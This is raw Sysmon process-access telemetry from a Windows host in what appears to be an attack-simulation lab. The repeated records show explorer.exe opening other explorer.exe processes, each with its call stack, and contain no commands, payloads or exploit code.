16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 